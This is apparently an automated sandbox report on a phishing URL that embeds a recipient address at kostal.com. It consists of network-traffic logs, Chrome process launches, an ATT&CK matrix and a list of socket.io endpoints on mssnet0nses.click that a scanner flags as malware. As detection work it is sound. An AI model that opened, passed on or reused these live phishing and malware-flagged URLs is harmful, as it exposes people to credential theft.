            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
            Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
            Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
            Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
            Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
            Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
            Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
            Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
            Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
            Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
            Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
            Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
            Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
            Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
            Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
            Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
            Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
            Source: unknownHTTPS traffic detected: 142.250.81.228:443 -> 192.168.2.5:49725 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.70.232:443 -> 192.168.2.5:49727 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.70.232:443 -> 192.168.2.5:49726 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.70.232:443 -> 192.168.2.5:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.70.232:443 -> 192.168.2.5:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.5:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.5:49741 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.44.201.164:443 -> 192.168.2.5:49740 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 3.168.73.27:443 -> 192.168.2.5:49742 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.209.72.9:443 -> 192.168.2.5:49752 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.5:49754 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.168.189:443 -> 192.168.2.5:49763 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.64.80.1:443 -> 192.168.2.5:49764 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.64.80.1:443 -> 192.168.2.5:49767 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.64.80.1:443 -> 192.168.2.5:49769 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.70.232:443 -> 192.168.2.5:49785 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.70.232:443 -> 192.168.2.5:49808 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.70.232:443 -> 192.168.2.5:49830 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.70.232:443 -> 192.168.2.5:49852 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.70.232:443 -> 192.168.2.5:49877 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.5:49901 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.70.232:443 -> 192.168.2.5:49907 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.70.232:443 -> 192.168.2.5:49930 version: TLS 1.2
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir2956_1019717835Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir2956_1019717835Jump to behavior
            Source: classification engineClassification label: mal96.phis.win@23/47@24/11
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2052,i,12725820562715277993,14582703269513856104,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2080 /prefetch:3
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2052,i,12725820562715277993,14582703269513856104,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5032 /prefetch:8
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2052,i,12725820562715277993,14582703269513856104,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2080 /prefetch:3Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2052,i,12725820562715277993,14582703269513856104,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5032 /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            Browser Extensions
            1
            Process Injection
            1
            Masquerading
            OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Process Injection
            LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            File Deletion
            Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
            Ingress Tool Transfer
            Traffic DuplicationData Destruction
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1650178 URL: https://www.oyabarista.com/... Startdate: 27/03/2025 Architecture: WINDOWS Score: 96 24 Suricata IDS alerts for network traffic 2->24 26 Found malware configuration 2->26 28 Antivirus detection for URL or domain 2->28 30 5 other signatures 2->30 6 chrome.exe 2 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 16 192.168.2.5, 138, 443, 49359 unknown unknown 6->16 11 chrome.exe 6->11         started        14 chrome.exe 6->14         started        process5 dnsIp6 18 www.oyabarista.com 104.21.70.232, 443, 49726, 49727 CLOUDFLARENETUS United States 11->18 20 www.google.com 142.250.81.228, 443, 49725, 49885 GOOGLEUS United States 11->20 22 16 other IPs or domains 11->22

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com0%Avira URL Cloudsafe
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=ceGoATplRk4sAOILAAe3100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrdFK&sid=cDcq_6oiPpEKxHw5AAe_100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=tT5WNbS8nK_GmKtDAAfC100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrizO&sid=2YiBHHEGh1iHOHKNAAfW100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrizQ&sid=2YiBHHEGh1iHOHKNAAfW100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=3KIffrGciGku9LcFAAe0100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrjtk&sid=sOtA6zh2FsG50UT0AAfZ100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=LP9pboDna7Lg8G9ZAAfh100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrcEg100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNraio&sid=3KIffrGciGku9LcFAAe0100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrhDU&sid=7qMH1QkTS0k0NzOqAAfQ100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNre0C&sid=tT5WNbS8nK_GmKtDAAfC100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrdFJ&sid=cDcq_6oiPpEKxHw5AAe_100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrc-m100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrkmv&sid=EMzR_z9H-w08ZyAdAAfc100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNre0A&sid=tT5WNbS8nK_GmKtDAAfC100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=7qMH1QkTS0k0NzOqAAfQ100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=F0YwhNqusdKEacySAAfI100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrfbC&sid=F0YwhNqusdKEacySAAfI100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrfbB&sid=F0YwhNqusdKEacySAAfI100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrhC-&sid=7qMH1QkTS0k0NzOqAAfQ100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrkmu&sid=EMzR_z9H-w08ZyAdAAfc100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=aHb_mt7ltpbxBIUjAAfL100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrjtl&sid=sOtA6zh2FsG50UT0AAfZ100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrail&sid=3KIffrGciGku9LcFAAe0100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrmGX100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNreWw100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=cDcq_6oiPpEKxHw5AAe_100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrlUi100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=gGEhwn_6LXzjgi5BAAfT100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNri5n&sid=gGEhwn_6LXzjgi5BAAfT100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=2YiBHHEGh1iHOHKNAAfW100%Avira URL Cloudmalware
            https://www.oyabarista.com/favicon.ico0%Avira URL Cloudsafe
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrfLw100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrbdS&sid=ceGoATplRk4sAOILAAe3100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrgMx&sid=aHb_mt7ltpbxBIUjAAfL100%Avira URL Cloudmalware
            https://www.oyabarista.com/files/images/Logo.png0%Avira URL Cloudsafe
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrjeo100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrikj100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=sOtA6zh2FsG50UT0AAfZ100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrnFW100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrmWi&sid=p_0vHNI0wq1dN5-_AAfl100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrgMy&sid=aHb_mt7ltpbxBIUjAAfL100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrkYN100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrg8S100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=websocket&sid=t010Hy5o6-DrcLMyAAe8100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrbdU&sid=ceGoATplRk4sAOILAAe3100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrdm-100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrbOF100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrcTV&sid=t010Hy5o6-DrcLMyAAe8100%Avira URL Cloudmalware
            https://mssnet0nses.click/socket.io/?EIO=4&transport=polling&t=PNNrhrx100%Avira URL Cloudmalware
